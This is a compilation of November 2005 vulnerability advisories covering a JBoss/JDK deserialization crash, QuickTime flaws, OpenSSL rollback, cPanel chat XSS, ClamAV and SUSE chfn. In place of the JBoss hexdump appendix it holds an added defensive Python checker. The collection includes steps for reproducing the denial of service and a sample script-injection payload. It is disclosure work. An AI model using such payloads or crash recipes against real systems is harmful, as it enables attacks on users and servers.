Remotely DoSing JBoss 4.0.2 with serialized java objects
=+= Remotely DoSing JBoss 4.0.2 with serialized java objects
    Implications of serialisation vulnerabilities in the JDK =+=

Author: Marc Schoenefeld, illegalaccess.org
        marc/at/illegalaccess.org
Date:   November 4, 2005

=+=

As I had the chance to demonstrate at HackInTheBox 2005, JDK 1.4.2 was vulnerable to a font deserialization bug. This can be used to crash the default installation of every version of the JBoss application server on Win32, up to the current 4.0.2 version.

JBoss offers the possibility of invoking JMX methods with the URL:

  http://host:8080/invoker/JMXInvokerServlet

I fuzzed several values in the GRAY.pf font file and created a serialized font object from it. The resulting file can be found in [Appendix:1]. Then I wrote a small program [Appendix:2] that POSTs the object via HTTP to the /invoker/JMXInvokerServlet. The following deserialisation call crashes the underlying JDK [Appendix:3].

To reconstruct, run
  1) a JBoss server in the default installation
  2) un-xxd the file iccprofile.ser.xxd to iccprofile.ser
  3) InvokerUpload.java [Appendix:2] with two arguments, like
       java InvokerUpload 127.0.0.1 iccprofile.ser

There are several other vulnerable object types that can be triggered that way from remote, like several classes from rt.jar that expose this bug also in 1.4.2_09 and 1.5.0_05, as shown in [Appendix:4] and [Appendix:5]. Even worse, these bugs crash the JVM on all platforms (WOCE, write once crash everywhere). Sun has been aware of this particular bug since 7/17/05. In order to finally support the safe release of a fix and an official advisory from Sun, I will not disclose the serialized vulnerable version of the affected java.lang.* classes until the release of a fix. After my bug report Sun announced fixes in 5.0U6, 1.4.2_11 and 1.3.1_17. It shall be noted that there is no vulnerability problem with JBoss itself, as this is a flaw in the JDK only.
Problems in the java serialisation API are not new, see
http://sunsolve.sun.com/search/document.do?assetkey=1-26-57707-1

JBoss is used only for demonstration purposes to show a good product may suffer from vulnerabilities in the layer below. Therefore every architecture that uses the serialisation API is potentially affected.

Sincerely
Marc Schönefeld

=+=

[Appendix:1] iccprofile.ser.xxd
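The defensive point of the advisory is that ObjectInputStream reconstructs whatever class the stream names before any application code sees it. The following Python is an added example, not code from the advisory, JBoss or the JDK: a front-end check that parses only the class-descriptor chain at the head of a POSTed stream and applies an allow list before the bytes reach a deserializer. The class names, serialVersionUIDs and flags of the sample are taken from the Appendix 1 hexdump; com.example.PingRequest and the ALLOW set are placeholders.

```python
"""Look-ahead check of the class-descriptor chain at the head of a Java
serialization stream, applied before any byte reaches ObjectInputStream."""
import struct

STREAM_MAGIC, STREAM_VERSION = 0xACED, 0x0005
TC_NULL, TC_REFERENCE, TC_CLASSDESC = 0x70, 0x71, 0x72
TC_OBJECT, TC_STRING, TC_ENDBLOCKDATA = 0x73, 0x74, 0x78
PRIMITIVE_CODES = set(b"BCDFIJSZ")

class StreamError(ValueError): """Anything that is not a well-formed descriptor chain."""

class Reader:  # bounds-checked big-endian cursor over the stream bytes
    def __init__(self, data: bytes):
        self.data, self.pos = data, 0
    def take(self, n: int) -> bytes:
        if self.pos + n > len(self.data):
            raise StreamError("truncated stream")
        chunk, self.pos = self.data[self.pos:self.pos + n], self.pos + n
        return chunk
    def u8(self) -> int: return self.take(1)[0]
    def u16(self) -> int: return struct.unpack(">H", self.take(2))[0]
    def utf(self) -> str: return self.take(self.u16()).decode("utf-8")

def read_class_desc_chain(r: Reader) -> list[str]:
    """Walk classDesc -> superClassDesc -> ...; consume metadata only, never class data."""
    names = []
    while True:
        tc = r.u8()
        if tc == TC_NULL:                   # end of the superclass chain
            return names
        if tc != TC_CLASSDESC:              # back-references and proxy descriptors are refused
            raise StreamError(f"unsupported descriptor tag 0x{tc:02x}")
        names.append(r.utf())               # className
        r.take(8)                           # serialVersionUID
        r.u8()                              # classDescFlags
        for _ in range(r.u16()):            # field descriptors
            code = r.u8()
            r.utf()                         # fieldName
            if code in PRIMITIVE_CODES:
                continue
            if code not in b"[L":
                raise StreamError(f"bad field type code 0x{code:02x}")
            tag = r.u8()                    # className1 is TC_STRING or TC_REFERENCE
            if tag == TC_STRING:
                r.utf()
            elif tag == TC_REFERENCE:
                r.take(4)
            else:
                raise StreamError("malformed className1")
        if r.u8() != TC_ENDBLOCKDATA:       # only an empty classAnnotation is accepted
            raise StreamError("non-empty class annotation")

def head_classes(stream: bytes) -> list[str]:
    """Class names in the descriptor chain of the stream's first object."""
    r = Reader(stream)
    if r.u16() != STREAM_MAGIC or r.u16() != STREAM_VERSION:
        raise StreamError("not a Java serialization stream")
    if r.u8() != TC_OBJECT:
        raise StreamError("stream does not start with TC_OBJECT")
    return read_class_desc_chain(r)

def verdict(stream: bytes, allow: set[str]) -> tuple[str, list[str]]:
    """Return ('allow' | 'deny' | 'malformed', classes seen at the head)."""
    try:
        classes = head_classes(stream)
    except StreamError:
        return "malformed", []
    return ("allow" if classes and all(c in allow for c in classes) else "deny"), classes

def _desc(name: str, suid: int, flags: int, prim_fields) -> bytes:
    """Constructed TC_CLASSDESC with primitive fields only (sample-data helper)."""
    b = bytes([TC_CLASSDESC]) + struct.pack(">H", len(name)) + name.encode()
    b += struct.pack(">QBH", suid, flags, len(prim_fields))
    for code, fname in prim_fields:
        b += code + struct.pack(">H", len(fname)) + fname.encode()
    return b + bytes([TC_ENDBLOCKDATA])

_HEAD = struct.pack(">HHB", STREAM_MAGIC, STREAM_VERSION, TC_OBJECT)
# Constructed sample: the descriptor chain from the advisory's hexdump (ICC_ProfileGray
# extending ICC_Profile, same serialVersionUIDs and flags) with the class data omitted.
SAMPLE_ICC = (_HEAD + _desc("java.awt.color.ICC_ProfileGray", 0xF0642FF1F299A2A7, 0x02, [])
              + _desc("java.awt.color.ICC_Profile", 0xC95794B0CFC9EF42, 0x03,
                      [(b"I", "iccProfileSerializedDataVersion")]) + bytes([TC_NULL]))
# Constructed sample: a placeholder request type the gateway is meant to accept.
ALLOW = {"com.example.PingRequest"}
SAMPLE_OK = _HEAD + _desc("com.example.PingRequest", 0x1, 0x02, [(b"J", "nonce")]) + bytes([TC_NULL])
```

Because the check stops at the descriptor chain, it also refuses streams that open with a back-reference or proxy descriptor instead of trying to resolve them, which is the conservative choice for a gateway.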
Advisory: Apple QuickTime Player Remote Integer Overflow (2)
Apple QuickTime Player Remote Integer Overflow (2)
by Piotr Bania [EMAIL PROTECTED]
http://pb.specialised.info
All rights reserved.

CVE-ID: CVE-2005-2754

Original location: http://pb.specialised.info/all/adv/quicktime-mov-io2-adv.txt

Severity: Critical - remote code execution.

Software affected:
  QuickTime package 7.0.1 for Mac OS X 10.3
  QuickTime package 7.0.1 for Mac OS X 10.4
  QuickTime package 6.5.2 for Mac OS X 10.3
  QuickTime package 6.5.2 for Mac OS X 10.2
  QuickTime package 7* for Windows
  Older versions may also be vulnerable.

Note: The following versions are not vulnerable, due to the fact that I reported the vulnerabilities before their releases:
  QuickTime package 7.0.2 for Mac OS X 10.3
  QuickTime package 7.0.2 for Mac OS X 10.4

0. DISCLAIMER

The author takes no responsibility for any actions taken with the provided information or code. The copyright for any material created by the author is reserved. Any duplication of code or text provided here in electronic or printed publications is not permitted without the author's agreement.

I. BACKGROUND

Apple QuickTime Player is one of the Apple QuickTime components used by hundreds of millions of users.

II. DESCRIPTION

Apple QuickTime Player is reported prone to a remote integer overflow vulnerability (exploitable via remotely originated content). Improper movie attributes could result in a very large memory copy, which leads to a potential memory overwrite. The vulnerability may lead to remote code execution when a specially crafted video file (MOV file) is loaded.

III. POC CODE

Due to the severity of this bug I will not release any proof of concept code for this issue.

IV. VENDOR RESPONSE

The vendor (Apple) has been notified and has released all necessary patches.

best regards,
Piotr Bania

--
Piotr Bania - [EMAIL PROTECTED] - 0xCD, 0x19
Fingerprint: 413E 51C7 912E 3D4E A62A BFA4 1FF6 689F BE43 AC33
http://pb.specialised.info - Key ID: 0xBE43AC33

Dinanzi a me non fuor cose create
se non etterne, e io etterno duro.
Lasciate ogne speranza, voi ch'intrate
                      - Dante, Inferno Canto III
Advisory: Apple QuickTime PICT Remote Memory Overwrite
Apple QuickTime PICT Remote Memory Overwrite
by Piotr Bania [EMAIL PROTECTED]
http://pb.specialised.info
All rights reserved.

CVE-ID: CVE-2005-2756

Original location: http://pb.specialised.info/all/adv/quicktime-pict-adv.txt

Severity: Critical - remote code execution.

Software affected:
  QuickTime package 7.0.1 for Mac OS X 10.3
  QuickTime package 7.0.1 for Mac OS X 10.4
  QuickTime package 6.5.2 for Mac OS X 10.3
  QuickTime package 6.5.2 for Mac OS X 10.2
  QuickTime package 7* for Windows
  Older versions may also be vulnerable.

Note: The following versions are not vulnerable, due to the fact that I reported the vulnerabilities before their releases:
  QuickTime package 7.0.2 for Mac OS X 10.3
  QuickTime package 7.0.2 for Mac OS X 10.4

0. DISCLAIMER

The author takes no responsibility for any actions taken with the provided information or code. The copyright for any material created by the author is reserved. Any duplication of code or text provided here in electronic or printed publications is not permitted without the author's agreement.

I. BACKGROUND

Apple QuickTime PictureViewer is one of the Apple QuickTime components used by hundreds of millions of users.

II. DESCRIPTION

Apple QuickTime PictureViewer is reported prone to a remote memory overwrite vulnerability (exploitable via remotely originated content). Expansion of compressed PICT data could exceed the size of the destination buffer, which causes a memory overwrite. The vulnerability may lead to remote code execution when a specially crafted picture file (PICT file) is loaded.

III. POC CODE

Due to the severity of this bug I will not release any proof of concept code for this issue.

IV. VENDOR RESPONSE

The vendor (Apple) has been notified and has released all necessary patches.

best regards,
Piotr Bania

--
Piotr Bania - [EMAIL PROTECTED] - 0xCD, 0x19
Fingerprint: 413E 51C7 912E 3D4E A62A BFA4 1FF6 689F BE43 AC33
http://pb.specialised.info - Key ID: 0xBE43AC33

Dinanzi a me non fuor cose create
se non etterne, e io etterno duro.
Lasciate ogne speranza, voi ch'intrate
                      - Dante, Inferno Canto III
Advisory: Apple QuickTime Player Remote Denial Of Service
Apple QuickTime Player Remote Denial Of Service
by Piotr Bania [EMAIL PROTECTED]
http://pb.specialised.info
All rights reserved.

CVE-ID: CVE-2005-2755

Original location: http://pb.specialised.info/all/adv/quicktime-mov-dos-adv.txt

Severity: Critical - attack against any application loading remotely-originated content.

Software affected:
  QuickTime package 7.0.1 for Mac OS X 10.3
  QuickTime package 7.0.1 for Mac OS X 10.4
  QuickTime package 6.5.2 for Mac OS X 10.3
  QuickTime package 6.5.2 for Mac OS X 10.2
  QuickTime package 7* for Windows
  Older versions may also be vulnerable.

Note: The following versions are not vulnerable, due to the fact that I reported the vulnerabilities before their releases:
  QuickTime package 7.0.2 for Mac OS X 10.3
  QuickTime package 7.0.2 for Mac OS X 10.4

0. DISCLAIMER

The author takes no responsibility for any actions taken with the provided information or code. The copyright for any material created by the author is reserved. Any duplication of code or text provided here in electronic or printed publications is not permitted without the author's agreement.

I. BACKGROUND

Apple QuickTime Player is one of the Apple QuickTime components used by hundreds of millions of users.

II. DESCRIPTION

Apple QuickTime Player is reported prone to a remote denial of service attack (exploitable via remotely originated content). A missing movie attribute is interpreted as an extension, but the absence of the extension is not flagged as an error, resulting in a de-reference of a NULL pointer. This will cause a denial of service against any application loading remotely-originated content.

III. POC CODE

Due to the severity of this bug I will not release any proof of concept code for this issue.

IV. VENDOR RESPONSE

The vendor (Apple) has been notified and has released all necessary patches.

best regards,
Piotr Bania

--
Piotr Bania - [EMAIL PROTECTED] - 0xCD, 0x19
Fingerprint: 413E 51C7 912E 3D4E A62A BFA4 1FF6 689F BE43 AC33
http://pb.specialised.info - Key ID: 0xBE43AC33

Dinanzi a me non fuor cose create
se non etterne, e io etterno duro.
Lasciate ogne speranza, voi ch'intrate
                      - Dante, Inferno Canto III
[SECURITY] [DSA 881-1] New OpenSSL 0.9.6 packages fix cryptographic weakness
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 881-1                     [EMAIL PROTECTED]
http://www.debian.org/security/                             Martin Schulze
November 4th, 2005                      http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package        : openssl096
Vulnerability  : cryptographic weakness
Problem type   : remote
Debian-specific: no
CVE ID         : CVE-2005-2969

Yutaka Oiwa discovered a vulnerability in the Open Secure Socket Layer (OpenSSL) library that can allow an attacker to perform active protocol-version rollback attacks that could lead to the use of the weaker SSL 2.0 protocol even though both ends support SSL 3.0 or TLS 1.0.

The following matrix explains which version in which distribution has this problem corrected.

                oldstable (woody)   stable (sarge)    unstable (sid)
  openssl       0.9.6c-2.woody.8    0.9.7e-3sarge1    0.9.8-3
  openssl094    0.9.4-6.woody.4     n/a               n/a
  openssl095    0.9.5a-6.woody.6    n/a               n/a
  openssl096    n/a                 0.9.6m-1sarge1    n/a
  openssl097    n/a                 n/a               0.9.7g-5

We recommend that you upgrade your libssl packages.

Upgrade Instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.
Debian GNU/Linux 3.1 alias sarge
- --------------------------------

  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb
Secunia Research: cPanel Entropy Chat Script Insertion Vulnerability
======================================================================
                     Secunia Research 04/11/2005

       - cPanel Entropy Chat Script Insertion Vulnerability -

======================================================================
Table of Contents

Affected Software....................................................1
Severity.............................................................2
Vendor's Description of Software.....................................3
Description of Vulnerability.........................................4
Solution.............................................................5
Time Table...........................................................6
Credits..............................................................7
About Secunia........................................................8
Verification.........................................................9

======================================================================
1) Affected Software

cPanel 10.2.0-R82 and 10.6.0-R137

Other versions may also be affected.

======================================================================
2) Severity

Rating: Moderately critical
Impact: Cross-site scripting
Where:  Remote

======================================================================
3) Vendor's Description of Software

cPanel WebHost Manager (WHM) is a next generation web hosting control panel system. Both cPanel and WHM are extremely feature rich as well as include an easy to use web based interface (GUI).

Product link:
http://www.cpanel.net/

======================================================================
4) Description of Vulnerability

Secunia Research has discovered a vulnerability in cPanel, which can be exploited by malicious people to conduct script insertion attacks.

Input passed to the chat message field in the pre-installed Entropy Chat script isn't properly sanitised before being used. This can be exploited to inject arbitrary script code, which will be executed in a user's browser session in context of an affected site when the malicious user data is viewed with the Microsoft Internet Explorer browser.

Example:
Send message <b style="width:expression([code])">text</b> via http://[host]:2084/

The vulnerability has been confirmed in versions 10.2.0-R82 and 10.6.0-R137. Other versions may also be affected.

======================================================================
5) Solution

Edit the source code to ensure that input is properly sanitised.

======================================================================
6) Time Table

10/10/2005 - Vulnerability discovered.
14/10/2005 - Vendor notified.
04/11/2005 - Public disclosure.

======================================================================
7) Credits

Discovered by Andreas Sandblad, Secunia Research.

======================================================================
8) About Secunia

Secunia collects, validates, assesses, and writes advisories regarding all the latest software vulnerabilities disclosed to the public. These advisories are gathered in a publicly available database at the Secunia website:

http://secunia.com/

Secunia offers services to our customers enabling them to receive all relevant vulnerability information to their specific system configuration.

Secunia offers a FREE mailing list called Secunia Security Advisories:

http://secunia.com/secunia_security_advisories/

======================================================================
9) Verification

Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2005-56/advisory/

======================================================================
[SECURITY] [DSA 882-1] New OpenSSL packages fix cryptographic weakness
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 882-1                     [EMAIL PROTECTED]
http://www.debian.org/security/                             Martin Schulze
November 4th, 2005                      http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package        : openssl095
Vulnerability  : cryptographic weakness
Problem type   : remote
Debian-specific: no
CVE ID         : CVE-2005-2969

Yutaka Oiwa discovered a vulnerability in the Open Secure Socket Layer (OpenSSL) library that can allow an attacker to perform active protocol-version rollback attacks that could lead to the use of the weaker SSL 2.0 protocol even though both ends support SSL 3.0 or TLS 1.0.

The following matrix explains which version in which distribution has this problem corrected.

                oldstable (woody)   stable (sarge)    unstable (sid)
  openssl       0.9.6c-2.woody.8    0.9.7e-3sarge1    0.9.8-3
  openssl094    0.9.4-6.woody.4     n/a               n/a
  openssl095    0.9.5a-6.woody.6    n/a               n/a
  openssl096    n/a                 0.9.6m-1sarge1    n/a
  openssl097    n/a                 n/a               0.9.7g-5

We recommend that you upgrade your libssl packages.

Upgrade Instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.
Debian GNU/Linux 3.0 alias woody
- --------------------------------

  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>
ZDI-05-002: Clam Antivirus Remote Code Execution
ZDI-05-002: Clam Antivirus Remote Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-05-002.html
November 4th, 2005

-- CVE ID:
CAN-2005-3303

-- Affected Vendor:
Clam AntiVirus

-- Affected Products:
Clam AntiVirus 0.80 through 0.87

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this vulnerability since October 24th, 2005 by Digital Vaccine protection filter ID 3874. For further product information on the TippingPoint IPS:

    http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on vulnerable ClamAV installations. Authentication is not required to exploit this vulnerability.

This specific flaw exists within libclamav/fsg.c during the unpacking of executable files compressed with FSG v1.33. Due to invalid bounds checking when copying user-supplied data to heap allocated memory, an exploitable memory corruption condition is created. The unpacking algorithm for other versions of FSG is not affected.

-- Vendor Response:
The bug has been fixed in version 0.87.1. Release notes:

    http://www.sourceforge.net/project/shownotes.php?release_id=368319

-- Disclosure Timeline:
2005.10.24 - Vulnerability reported to vendor
2005.10.24 - Digital Vaccine released to TippingPoint customers
2005.10.25 - Vulnerability information provided to ZDI security partners
2005.11.04 - Public release of advisory

-- Credit:
This vulnerability was discovered by an anonymous ZDI researcher.

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, a division of 3Com, the Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at:

    http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is used.
3Com does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, 3Com provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, 3Com provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product.
SUSE Security Announcement: pwdutils, shadow (SUSE-SA:2005:064)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

______________________________________________________________________________

                        SUSE Security Announcement

        Package:                pwdutils, shadow
        Announcement ID:        SUSE-SA:2005:064
        Date:                   Fri, 04 Nov 2005 14:00:00 +
        Affected Products:      SUSE LINUX 10.0
                                SUSE LINUX 9.3
                                SUSE LINUX 9.2
                                SUSE LINUX 9.1
                                SuSE Linux 9.0
                                SuSE Linux Desktop 1.0
                                SuSE Linux Enterprise Server 8
                                SUSE SLES 9
                                UnitedLinux 1.0
        Vulnerability Type:     local privilege escalation
        Severity (1-10):        7
        SUSE Default Package:   yes
        Cross-References:       -

    Content of This Advisory:
        1) Security Vulnerability Resolved:
             pwdutils privilege escalation
           Problem Description
        2) Solution or Work-Around
        3) Special Instructions and Notes
        4) Package Location and Checksums
        5) Pending Vulnerabilities, Solutions, and Work-Arounds:
             - See SUSE Security Summary Report
        6) Authenticity Verification and Additional Information
______________________________________________________________________________

1) Problem Description and Brief Discussion

   Thomas Gerisch found that the setuid 'chfn' program contained in the pwdutils suite insufficiently checks its arguments when changing the GECOS field. This bug leads to a trivially exploitable local privilege escalation that allows users to gain root access.

   We would like to thank Thomas Gerisch for pointing out the problem.

2) Solution or Work-Around

   Removing the setuid bit from /usr/bin/chfn renders chfn useless but also prevents successful exploitation. Note that this workaround only lasts until the next run of SuSEconfig, which will restore the setuid bit if you are on permissions level 'easy' or 'secure'.

3) Special Instructions and Notes

   None

4) Package Location and Checksums

   The preferred method for installing security updates is to use the YaST Online Update (YOU) tool. YOU detects which updates are required and automatically performs the necessary steps to verify and install them. Alternatively, download the update packages for your distribution manually and verify their integrity by the methods listed in Section 6 of this announcement.
   Then install the packages using the command

     rpm -Fhv file.rpm

   to apply the update, replacing file.rpm with the filename of the downloaded RPM package.